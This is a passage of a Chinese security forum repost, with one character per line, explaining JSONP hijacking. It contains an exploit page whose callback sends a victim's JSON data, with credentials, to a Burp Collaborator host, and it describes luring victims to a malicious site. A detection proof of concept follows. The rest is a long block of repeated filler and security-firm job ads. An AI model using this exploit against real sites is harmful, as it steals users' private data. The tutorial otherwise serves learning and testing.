c
r
i
p
t
t
y
p
e
=
"
t
e
x
t
/
j
a
v
a
s
c
r
i
p
t
"
s
r
c
=
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
j
s
o
n
p
.
p
h
p
?
j
s
o
n
p
=
c
a
l
l
b
a
c
k
"
>
<
/
s
c
r
i
p
t
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
效
果
如
下
:
此
时
通
过
j
s
o
n
p
接
口
,
实
现
了
跨
域
传
输
。
然
而
该
跨
域
传
输
过
程
存
在
很
大
的
安
全
安
全
问
题
,
因
为
对
j
s
o
n
参
数
调
用
者
没
有
任
何
限
制
2
.
2
漏
洞
利
用
流
程
:
漏
洞
利
用
流
程
:
这
里
使
用
b
u
r
p
的
c
o
l
l
a
b
o
r
a
t
o
r
c
l
i
e
n
t
功
能
来
接
收
h
t
t
p
记
录
,
主
要
是
为
了
实
验
,
也
演
示
一
下
c
o
l
l
a
b
o
r
a
t
o
r
c
l
i
e
n
t
的
强
大
功
能
,
在
实
际
利
用
中
可
以
直
接
向
本
地
1
2
7
.
0
.
0
1
发
送
请
求
,
在
w
e
b
日
志
记
录
中
查
看
即
可
2
.
2
.
1
打
开
打
开
c
o
l
l
a
b
o
r
a
t
o
r
c
l
i
e
n
t
获
取
请
求
链
接
获
取
请
求
链
接
2
.
2
.
2
复
制
链
接
填
入
脚
本
,
点
击
复
制
链
接
填
入
脚
本
,
点
击
P
o
l
l
n
o
w
开
始
循
环
监
听
开
始
循
环
监
听
h
t
t
p
请
求
。
请
求
。
<
h
1
>
j
s
o
n
p
e
x
p
<
/
h
1
>
<
s
c
r
i
p
t
t
y
p
e
=
"
t
e
x
t
/
j
a
v
a
s
c
r
i
p
t
"
>
f
u
n
c
t
i
o
n
c
a
l
l
b
a
c
k
(
r
e
s
u
l
t
)
{
v
a
r
r
e
q
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
/
/
向
b
u
r
p
的
c
o
l
l
a
b
o
r
a
t
o
r
c
l
i
e
n
t
发
送
请
求
,
并
携
带
获
取
到
j
s
o
n
数
据
r
e
q
.
o
p
e
n
(
'
g
e
t
'
,
'
h
t
t
p
s
:
/
/
r
2
u
9
a
t
j
p
5
8
8
p
t
9
6
t
5
c
p
e
f
5
o
4
0
v
6
l
u
a
.
b
u
r
p
c
o
l
l
a
b
o
r
a
t
o
r
.
n
e
t
/
?
u
s
e
r
i
n
f
o
=
'
+
r
e
s
u
l
t
,
t
r
u
e
)
;
r
e
q
.
w
i
t
h
C
r
e
d
e
n
t
i
a
l
s
=
t
r
u
e
;
r
e
q
.
s
e
n
d
(
)
;
}
<
/
s
c
r
i
p
t
>
/
/
j
s
o
n
p
接
口
<
s
c
r
i
p
t
t
y
p
e
=
"
t
e
x
t
/
j
a
v
a
s
c
r
i
p
t
"
s
r
c
=
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
j
s
o
n
p
.
p
h
p
?
j
s
o
n
p
=
c
a
l
l
b
a
c
k
"
>
<
/
s
c
r
i
p
t
>
2
.
2
.
3
将
脚
本
部
署
到
恶
意
网
站
,
并
将
网
站
链
接
发
送
给
受
害
者
,
受
害
者
访
问
链
接
,
即
可
在
将
脚
本
部
署
到
恶
意
网
站
,
并
将
网
站
链
接
发
送
给
受
害
者
,
受
害
者
访
问
链
接
,
即
可
在
c
o
l
l
a
b
o
r
a
t
o
r
c
l
i
e
n
t
中
获
取
到
用
户
的
中
获
取
到
用
户
的
j
s
o
n
数
据
。
数
据
。
2
.
3
j
s
o
n
p
挖
掘
思
路
挖
掘
思
路
知
道
了
应
用
场
景
,
也
知
道
利
用
流
程
,
此
时
就
应
该
思
考
怎
么
利
用
j
s
o
n
p
漏
洞
了
工
具
挖
掘
可
以
使
用
x
r
a
y
,
x
r
a
y
自
带
有
j
s
o
n
p
漏
洞
检
测
功
能
,
监
听
端
口
,
被
动
扫
描
就
完
事
手
工
挖
掘
也
有
一
些
小
技
巧
,
大
佬
总
结
的
j
s
o
n
p
接
口
常
用
参
数
:
c
b
c
a
l
l
b
a
c
k
j
s
o
n
c
b
j
s
o
n
p
c
b
j
s
o
n
p
j
Q
u
e
r
y
j
s
o
n
c
a
l
l
b
a
c
k
j
s
o
n
p
c
a
l
l
b
a
c
k
j
s
o
n
c
a
l
l
j
s
o
n
p
c
a
l
l
访
问
网
站
首
页
1
.
打
开
n
e
t
w
o
r
k
2
.
勾
选
P
r
e
s
e
r
v
e
r
l
o
g
3
.
在
搜
索
框
中
搜
索
常
用
j
s
o
n
p
参
数
搜
索
到
带
有
相
关
参
数
的
链
接
,
即
可
使
用
e
x
p
验
证
是
否
存
在
j
s
o
n
p
泄
露
。
验
证
p
o
c
:
<
!
D
O
C
T
Y
P
E
h
t
m
l
>
<
h
t
m
l
>
<
h
e
a
d
>
<
t
i
t
l
e
>
j
s
o
n
p
劫
持
验
证
示
例
<
/
t
i
t
l
e
>
<
m
e
t
a
c
h
a
r
s
e
t
=
"
u
t
f
-
8
"
>
<
s
t
y
l
e
t
y
p
e
=
"
t
e
x
t
/
c
s
s
"
>
t
a
b
l
e
{
d
i
s
p
l
a
y
:
i
n
l
i
n
e
}
<
/
s
t
y
l
e
>
<
/
h
e
a
d
>
<
b
o
d
y
>
<
s
c
r
i
p
t
s
r
c
=
'
h
t
t
p
s
:
/
/
c
d
n
.
s
t
a
t
i
c
f
i
l
e
.
o
r
g
/
j
q
u
e
r
y
/
1
.
1
0
.
2
/
j
q
u
e
r
y
.
m
i
n
.
j
s
'
>
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
t
y
p
e
=
"
t
e
x
t
/
j
a
v
a
s
c
r
i
p
t
"
>
f
u
n
c
t
i
o
n
c
a
l
l
b
a
c
k
(
j
s
o
n
)
{
c
o
n
s
o
l
e
.
l
o
g
(
j
s
o
n
)
;
}
v
a
r
s
=
d
o
c
u
m
e
n
t
.
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
s
.
t
y
p
e
=
"
t
e
x
t
/
j
a
v
a
s
c
r
i
p
t
"
;
/
/
漏
洞
可
能
存
在
点
s
.
s
r
c
=
'
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
j
s
o
n
p
.
p
h
p
?
j
s
o
n
p
=
c
a
l
l
b
a
c
k
'
;
d
o
c
u
m
e
n
t
.
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
<
/
s
c
r
i
p
t
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
c
o
n
s
o
l
e
.
l
o
g
获
取
到
数
据
,
说
明
存
在
该
漏
洞
参
考
链
接
:
参
考
链
接
:
h
t
t
p
s
:
/
/
b
l
o
g
.
k
n
o
w
n
s
e
c
.
c
o
m
/
2
0
1
5
/
0
3
/
j
s
o
n
p
_
s
e
c
u
r
i
t
y
_
t
e
c
h
n
i
c
/
h
t
t
p
s
:
/
/
m
p
.
w
e
i
x
i
n
.
q
q
.
c
o
m
/
s
/
S
u
E
p
F
3
R
I
Z
I
v
2
C
c
I
U
o
k
8
S
o
Q
h
t
t
p
s
:
/
/
w
w
w
.
k
0
r
z
3
n
.
c
o
m
/
2
0
1
8
/
0
6
/
0
5
/
%
E
7
%
9
4
%
B
1
%
E
6
%
B
5
%
8
5
%
E
5
%
8
5
%
A
5
%
E
6
%
B
7
%
B
1
%
E
7
%
9
0
%
8
6
%
E
8
%
A
7
%
A
3
J
S
O
N
P
%
E
5
%
B
9
%
B
6
%
E
6
%
8
B
%
9
3
%
E
5
%
B
1
%
9
5
/
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
招
聘
启
事
安
恒
雷
神
众
测
S
R
C
运
营
(
实
习
生
)
—
—
—
—
—
—
—
—
【
职
责
描
述
】
1
.
负
责
S
R
C
的
微
博
、
微
信
公
众
号
等
线
上
新
媒
体
的
运
营
工
作
,
保
持
用
户
活
跃
度
,
提
高
站
点
访
问
量
;
2
.
负
责
白
帽
子
提
交
漏
洞
的
漏
洞
审
核
、
R
a
n
k
评
级
、
漏
洞
修
复
处
理
等
相
关
沟
通
工
作
,
促
进
审
核
人
员
与
白
帽
子
之
间
友
好
协
作
沟
通
;
3
.
参
与
策
划
、
组
织
和
落
实
针
对
白
帽
子
的
线
下
活
动
,
如
沙
龙
、
发
布
会
、
技
术
交
流
论
坛
等
;
4
.
积
极
参
与
雷
神
众
测
的
品
牌
推
广
工
作
,
协
助
技
术
人
员
输
出
优
质
的
技
术
文
章
;
5
.
积
极
参
与
公
司
媒
体
、
行
业
内
相
关
媒
体
及
其
他
市
场
资
源
的
工
作
沟
通
工
作
。
【
任
职
要
求
】
1
.
责
任
心
强
,
性
格
活
泼
,
具
备
良
好
的
人
际
交
往
能
力
;
2
.
对
网
络
安
全
感
兴
趣
,
对
行
业
有
基
本
了
解
;
3
.
良
好
的
文
案
写
作
能
力
和
活
动
组
织
协
调
能
力
。
简
历
投
递
至
s
t
r
a
t
e
g
y
@
d
b
a
p
p
s
e
c
u
r
i
t
y
.
c
o
m
.
c
n
设
计
师
(
实
习
生
)
—
—
—
—
—
—
—
—
【
职
位
描
述
】
负
责
设
计
公
司
日
常
宣
传
图
片
、
软
文
等
与
设
计
相
关
工
作
,
负
责
产
品
品
牌
设
计
。
【
职
位
要
求
】
1
、
从
事
平
面
设
计
相
关
工
作
1
年
以
上
,
熟
悉
印
刷
工
艺
;
具
有
敏
锐
的
观
察
力
及
审
美
能
力
,
及
优
异
的
创
意
设
计
能
力
;
有
V
I
设
计
、
广
告
设
计
、
画
册
设
计
等
专
长
;
2
、
有
良
好
的
美
术
功
底
,
审
美
能
力
和
创
意
,
色
彩
感
强
;
精
通
p
h
o
t
o
s
h
o
p
/
i
l
l
u
s
t
r
a
t
o
r
/
c
o
r
e
l
d
r
e
w
/
等
设
计
制
作
软
件
;
3
、
有
品
牌
传
播
、
产
品
设
计
或
新
媒
体
视
觉
工
作
经
历
;
【
关
于
岗
位
的
其
他
信
息
】
企
业
名
称
:
杭
州
安
恒
信
息
技
术
股
份
有
限
公
司
办
公
地
点
:
杭
州
市
滨
江
区
安
恒
大
厦
1
9
楼
学
历
要
求
:
本
科
及
以
上
工
作
年
限
:
1
年
及
以
上
,
条
件
优
秀
者
可
放
宽
简
历
投
递
至
s
t
r
a
t
e
g
y
@
d
b
a
p
p
s
e
c
u
r
i
t
y
.
c
o
m
.
c
n
安
全
招
聘
—
—
—
—
—
—
—
—
公
司
:
安
恒
信
息
岗
位
:
W
e
b
安
全
安
全
研
究
员
部
门
:
战
略
支
援
部
薪
资
:
1
3
-
3
0
K
工
作
年
限
:
1
年
+
工
作
地
点
:
杭
州
(
总
部
)
、
广
州
、
成
都
、
上
海
、
北
京
工
作
环
境
:
一
座
大
厦
,
健
身
场
所
,
医
师
,
帅
哥
,
美
女
,
高
级
食
堂
…
【
岗
位
职
责
】
1
.
定
期
面
向
部
门
、
全
公
司
技
术
分
享
;
2
.
前
沿
攻
防
技
术
研
究
、
跟
踪
国
内
外
安
全
领
域
的
安
全
动
态
、
漏
洞
披
露
并
落
地
沉
淀
;
3
.
负
责
完
成
部
门
渗
透
测
试
、
红
蓝
对
抗
业
务
;
4
.
负
责
自
动
化
平
台
建
设
5
.
负
责
针
对
常
见
W
A
F
产
品
规
则
进
行
测
试
并
落
地
b
y
p
a
s
s
方
案
5
.
负
责
针
对
常
见
W
A
F
产
品
规
则
进
行
测
试
并
落
地
b
y
p
a
s
s
方
案
【
岗
位
要
求
】
1
.
至
少
1
年
安
全
领
域
工
作
经
验
;
2
.
熟
悉
H
T
T
P
协
议
相
关
技
术
3
.
拥
有
大
型
产
品
、
C
M
S
、
厂
商
漏
洞
挖
掘
案
例
;
4
.
熟
练
掌
握
p
h
p
、
j
a
v
a
、
a
s
p
.
n
e
t
代
码
审
计
基
础
(
一
种
或
多
种
)
5
.
精
通
W
e
b
F
u
z
z
模
糊
测
试
漏
洞
挖
掘
技
术
6
.
精
通
O
W
A
S
P
T
O
P
1
0
安
全
漏
洞
原
理
并
熟
悉
漏
洞
利
用
方
法
7
.
有
过
独
立
分
析
漏
洞
的
经
验
,
熟
悉
各
种
W
e
b
调
试
技
巧
8
.
熟
悉
常
见
编
程
语
言
中
的
至
少
一
种
(
A
s
p
.
n
e
t
、
P
y
t
h
o
n
、
p
h
p
、
j
a
v
a
)
【
加
分
项
】
1
.
具
备
良
好
的
英
语
文
档
阅
读
能
力
;
2
.
曾
参
加
过
技
术
沙
龙
担
任
嘉
宾
进
行
技
术
分
享
;
3
.
具
有
C
I
S
S
P
、
C
I
S
A
、
C
S
S
L
P
、
I
S
O
2
7
0
0
1
、
I
T
I
L
、
P
M
P
、
C
O
B
I
T
、
S
e
c
u
r
i
t
y
+
、
C
I
S
P
、
O
S
C
P
等
安
全
相
关
资
质
者
;
4
.
具
有
大
型
S
R
C
漏
洞
提
交
经
验
、
获
得
年
度
表
彰
、
大
型
C
T
F
夺
得
名
次
者
;
5
.
开
发
过
安
全
相
关
的
开
源
项
目
;
6
.
具
备
良
好
的
人
际
沟
通
、
协
调
能
力
、
分
析
和
解
决
问
题
的
能
力
者
优
先
;
7
.
个
人
技
术
博
客
;
8
.
在
优
质
社
区
投
稿
过
文
章
;
岗
位
:
安
全
红
队
武
器
自
动
化
工
程
师
薪
资
:
1
3
-
3
0
K
工
作
年
限
:
2
年
+
工
作
地
点
:
杭
州
(
总
部
)
【
岗
位
职
责
】
1
.
负
责
红
蓝
对
抗
中
的
武
器
化
落
地
与
研
究
;
2
.
平
台
化
建
设
;
3
.
安
全
研
究
落
地
。
【
岗
位
要
求
】
1
.
熟
练
使
用
P
y
t
h
o
n
、
j
a
v
a
、
c
/
c
+
+
等
至
少
一
门
语
言
作
为
主
要
开
发
语
言
;
2
.
熟
练
使
用
D
j
a
n
g
o
、
f
l
a
s
k
等
常
用
w
e
b
开
发
框
架
、
以
及
熟
练
使
用
m
y
s
q
l
、
m
o
n
g
o
D
B
、
r
e
d
i
s
等
数
据
存
储
方
案
;
3
:
熟
悉
域
安
全
以
及
内
网
横
向
渗
透
、
常
见
w
e
b
等
漏
洞
原
理
;
4
.
对
安
全
技
术
有
浓
厚
的
兴
趣
及
热
情
,
有
主
观
研
究
和
学
习
的
动
力
;
5
.
具
备
正
向
价
值
观
、
良
好
的
团
队
协
作
能
力
和
较
强
的
问
题
解
决
能
力
,
善
于
沟
通
、
乐
于
分
享
。
【
加
分
项
】
1
.
有
高
并
发
t
c
p
服
务
、
分
布
式
等
相
关
经
验
者
优
先
;
2
.
在
g
i
t
h
u
b
上
有
开
源
安
全
产
品
优
先
;
3
:
有
过
安
全
开
发
经
验
、
独
自
分
析
过
相
关
开
源
安
全
工
具
、
以
及
参
与
开
发
过
相
关
后
渗
透
框
架
等
优
先
;
4
.
在
f
r
e
e
b
u
f
、
安
全
客
、
先
知
等
安
全
平
台
分
享
过
相
关
技
术
文
章
优
先
;
5
.
具
备
良
好
的
英
语
文
档
阅
读
能
力
。
简
历
投
递
至
s
t
r
a
t
e
g
y
@
d
b
a
p
p
s
e
c
u
r
i
t
y
.
c
o
m
.
c
n
岗
位
:
红
队
武
器
化
G
o
l
a
n
g
开
发
工
程
师
薪
资
:
1
3
-
3
0
K
工
作
年
限
:
2
年
+
工
作
地
点
:
杭
州
(
总
部
)
【
岗
位
职
责
】
1
.
负
责
红
蓝
对
抗
中
的
武
器
化
落
地
与
研
究
;
2
.
平
台
化
建
设
;
3
.
安
全
研
究
落
地
。
【
岗
位
要
求
】
1
.
掌
握
C
/
C
+
+
/
J
a
v
a
/
G
o
/
P
y
t
h
o
n
/
J
a
v
a
S
c
r
i
p
t
等
至
少
一
门
语
言
作
为
主
要
开
发
语
言
;
2
.
熟
练
使
用
G
i
n
、
B
e
e
g
o
、
E
c
h
o
等
常
用
w
e
b
开
发
框
架
、
熟
悉
M
y
S
Q
L
、
R
e
d
i
s
、
M
o
n
g
o
D
B
等
主
流
数
据
库
结
构
的
设
计
,
有
独
立
部
署
调
优
经
验
;
3
.
了
解
d
o
c
k
e
r
,
能
进
行
简
单
的
项
目
部
署
;
3
.
熟
悉
常
见
w
e
b
漏
洞
原
理
,
并
能
写
出
对
应
的
利
用
工
具
;
4
.
熟
悉
T
C
P
/
I
P
协
议
的
基
本
运
作
原
理
;
5
.
对
安
全
技
术
与
开
发
技
术
有
浓
厚
的
兴
趣
及
热
情
,
有
主
观
研
究
和
学
习
的
动
力
,
具
备
正
向
价
值
观
、
良
好
的
团
队
协
作
能
力
和
较
强
的
问
题
解
决
能
力
,
善
于
沟
通
、
乐
于
分
享
。
【
加
分
项
】
1
.
有
高
并
发
t
c
p
服
务
、
分
布
式
、
消
息
队
列
等
相
关
经
验
者
优
先
;
2
.
在
g
i
t
h
u
b
上
有
开
源
安
全
产
品
优
先
;
3
:
有
过
安
全
开
发
经
验
、
独
自
分
析
过
相
关
开
源
安
全
工
具
、
以
及
参
与
开
发
过
相
关
后
渗
透
框
架
等
优
先
;
4
.
在
f
r
e
e
b
u
f
、
安
全
客
、
先
知
等
安
全
平
台
分
享
过
相
关
技
术
文
章
优
先
;
5
.
具
备
良
好
的
英
语
文
档
阅
读
能
力
。
简
历
投
递
至
s
t
r
a
t
e
g
y
@
d
b
a
p
p
s
e
c
u
r
i
t
y
.
c
o
m
.
c
n
注
:
本
文
由
E
安
全
编
译
报
道
,
转
载
请
注
原
文
地
址
h
t
t
p
s
:
/
/
w
w
w
.
e
a
s
y
a
q
.
c
o
m
推
荐
阅
读
:
“
操
纵
”
近
4
0
个
国
家
的
银
行
和
金
融
机
构
美
国
政
府
对
朝
鲜
黑
客
发
出
警
告
警
惕
!
你
所
使
用
的
比
特
币
交
易
平
台
很
可
能
是
假
冒
的
为
保
护
5
G
网
络
安
全
美
国
C
I
S
A
确
定
五
项
战
略
计
划
8
3
0
万
用
户
数
据
遭
泄
露
!
免
费
图
片
素
材
网
站
F
r
e
e
p
i
k
近
日
出
现
安
全
漏
洞
警
惕
!
美
国
政
府
曝
光
朝
鲜
新
型
恶
意
攻
击
软
件
▼
点
击
“
阅
读
原
文
”
查
看
更
多
精
彩
内
容
喜
欢
记
得
打
赏
小
E
哦
!
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞